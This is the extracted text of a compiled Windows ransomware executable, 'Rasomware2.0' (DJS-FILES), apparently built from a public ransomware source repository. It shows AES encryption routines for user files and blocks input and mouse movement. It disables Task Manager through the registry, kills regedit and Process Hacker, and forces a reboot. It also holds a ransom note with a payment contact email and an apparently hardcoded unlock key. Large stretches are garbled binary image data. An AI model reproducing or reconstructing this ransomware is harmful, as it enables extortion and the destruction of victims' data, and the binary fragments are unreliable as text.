!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Rasomware2.0
Rasomware2._0
<>9__6_0
<Ransomware2_Load>b__6_0
<>c__DisplayClass6_0
<Ransomware2_Load>b__1
IEnumerable`1
label1
button1
pictureBox1
Microsoft.Win32
User32
ToInt32
Func`2
Ransomware2
label2
pictureBox2
label3
DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
SHA256
get_UTF8
<Module>
<PrivateImplementationDetails>
SW_HIDE
System.IO
set_IV
SW_SHOW
mscorlib
System.Collections.Generic
Ransomware2_Load
add_Load
RijndaelManaged
add_TextChanged
codebox_TextChanged
set_Enabled
bytesToBeDecrypted
bytesToBeEncrypted
fileEncrypted
Synchronized
get_Hand
RegistryValueKind
password
defaultInstance
tmr_hide
set_Mode
set_AutoScaleMode
set_SizeMode
PictureBoxSizeMode
CryptoStreamMode
CipherMode
set_Image
GetEnvironmentVariable
Enumerable
IDisposable
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
get_MainWindowHandle
DecryptionFile
EncryptionFile
DecryptFile
EncryptFile
set_FormBorderStyle
set_FlatStyle
FontStyle
set_Name
get_ProcessName
GetProcessesByName
DateTime
startTime
Combine
LocalMachine
System.Core
get_Culture
set_Culture
resourceCulture
ButtonBase
ApplicationSettingsBase
Dispose
FreezeMouse
Thawouse
Create
EditorBrowsableState
Delete
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
Rasomware2.0.exe
set_Size
get_BlockSize
set_BlockSize
set_AutoSize
set_ClientSize
get_KeySize
set_KeySize
ISupportInitialize
tmr_if
Encoding
System.Runtime.Versioning
ToString
GetString
Ransomware2_FormClosing
add_FormClosing
disposing
System.Drawing
ComputeHash
GetFolderPath
get_Black
add_Tick
tmr_hide_Tick
tmr_if_Tick
tmr_clock_Tick
tmr_encrypt_Tick
tmr_show_Tick
button1_Click
add_Click
tmr_clock
set_Interval
set_Cancel
System.ComponentModel
user32.dll
ContainerControl
CryptoStream
MemoryStream
Program
System
SymmetricAlgorithm
HashAlgorithm
ICryptoTransform
resourceMan
TimeSpan
set_TextAlign
set_Icon
set_ShowIcon
MessageBoxIcon
Application
set_Location
System.Configuration
System.Globalization
op_Subtraction
System.Reflection
ControlCollection
set_StartPosition
FormStartPosition
SearchOption
CoreDecryption
CoreEncryption
Button
get_No
FileInfo
CultureInfo
FileSystemInfo
get_Help
set_TabStop
System.Linq
set_ShowInTaskbar
SpecialFolder
sender
get_ResourceManager
ComponentResourceManager
FormClosingEventHandler
System.CodeDom.Compiler
IContainer
CurrentUser
set_ForeColor
set_BackColor
set_UseVisualStyleBackColor
set_Cursor
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Rasomware2._0.Ransomware2.resources
Rasomware2._0.Properties.Resources.resources
DebuggingModes
Rasomware2._0.Properties
EnumerateFiles
GetFiles
EnableVisualStyles
GetProcesses
get_Attributes
FileAttributes
FromMinutes
passwordBytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
GetBytes
Settings
FormClosingEventArgs
CancelEventArgs
<>4__this
get_Controls
System.Windows.Forms
set_AutoScaleDimensions
MessageBoxButtons
RuntimeHelpers
Cursors
Process
components
Concat
GetObject
EndInit
BeginInit
GraphicsUnit
get_Default
SetCompatibleTextRenderingDefault
DialogResult
HorizontalAlignment
ContentAlignment
Environment
InitializeComponent
set_Font
AES_Decrypt
OFF_Encrypt
AES_Encrypt
Start_Encrypt
tmr_encrypt
set_TopMost
SuspendLayout
ResumeLayout
PerformLayout
BlockInput
System.Text
get_Text
set_Text
get_Now
ShowWindow
nCmdShow
tmr_show
get_Yellow
set_TabIndex
MessageBox
PictureBox
set_MinimizeBox
set_MaximizeBox
TextBox
codebox
InitializeArray
ToArray
set_Key
CreateSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
Directory
Registry
set_Opacity
op_Equality
WrapNonExceptionThrows
Rasomware2.0
Copyright
2020
$7085cee3-7cca-47e8-ac84-1bad1454800c
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ahSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADPBj
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
RE@QQPPbA
s];n4%
%;;EG>
.6JnY{
jw8ObzY
cz-dY`
bw4d"R
x}gZ*e
g!y.953
_j{~vo{
tZAwI0
JwY0rs
\NLLlH
x999A
)))]qqq%
'''\LLL)
000{ccc
@@@=
l---b'''eLLL
$$$j222Ihhh"
"""`'''n...c|||
>>>b,,,_XXX.
@@@D
PPP*!!!
w'''d666Dggg
###~qqq
,,,b~~~
OOO &&&
KKK5!!!b
222XJJJ<
333R999N
@@@L]]](
]]];DDD<888<:::<AAA<XXX5zzz
&&&]777;vvv,///
hhh BBB5&&&Y
VVV+!!!
'''xbbb
%%%zUUU4
'''9!!!J
###L)))6
S***2LLL
!!!Byyy
'''+```
555 HHH
c,,,&bbb
u 5"""0
###/(((
c&&&&yyy
=----------------DJS - FILES----------------=
=--------------------------------=
OMG.... All your Documents, Pictures, Videos, Music and others
have been encrypt!!
=--------------------------------=
A key is required for decryption, which you can purchase via
this contact email
" djsfilesid@gmail.com "
=--------------------------------=
=----------------WARNING----------------=
1. Do not turn off the computer
2. Do not turn on Task Manager
3. Don't try to kill this
4. Don't try to break your password without paying
5. Do not try to open encrypted files
=--------------------------------=A
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
Hgtzb:
{XwfYw
Q}qTV(
ED}!QVT
j)s-gn
ghJiC-
^%bS]F
`}JDW]FC4
<%bS]FC2
`iJDW]F
JDW]FoW
?%#neL
Q6dH%m)
32b}w<
UmN^'qe
{r<yL?H
`Kf/>,=
xtSks9,
kjmSN%
x<Sks9
xMSksy+
hjmUvK,,E
xm=xWv
]y/=tx-)
n=IDAT
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
Hgtzb:
{XwfYw
Q}qTV(
ED}!QVT
j)s-gn
ghJiC-
^%bS]F
`}JDW]FC4
<%bS]FC2
`iJDW]F
JDW]FoW
?%#neL
Q6dH%m)
32b}w<
UmN^'qe
{r<yL?H
`Kf/>,=
xtSks9,
kjmSN%
x<Sks9
xMSksy+
hjmUvK,,E
xm=xWv
]y/=tx-)
n=IDAT
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\daanujs\Downloads\Ransomware_source_code-master\Rasomware2.0\Rasomware2.0\obj\Debug\Rasomware2.0.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableTaskMgr
Control Panel\Desktop
Wallpaper
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\desktop.ini
USERPROFILE
Downloads
regedit
Processhacker
Ransomware2.0
shutdown
/r /t 0
Incorrect key
WRONG KEY
danujagadsatriaid088215940150
The key is correct
UNLOCKED
explorer.exe
Rasomware2.0
pictureBox1.Image
pictureBox1
pictureBox2.Image
pictureBox2
Microsoft Sans Serif
Georgia
label1
label1.Text
codebox
Consolas
button1
Gadugi
label2
00:00:00
Franklin Gothic Medium
label3
ENTER KEY DECRYPT
$this.Icon
Ransomware2
DJS-FILES
Rasomware2._0.Properties.Resources
hh\:mm\:ss
$this.Icon
label1.Text
pictureBox1.Image
pictureBox2.Image
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Rasomware2.0
FileVersion
1.0.0.0
InternalName
Rasomware2.0.exe
LegalCopyright
Copyright
2020
LegalTrademarks
OriginalFilename
Rasomware2.0.exe
ProductName
Rasomware2.0
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0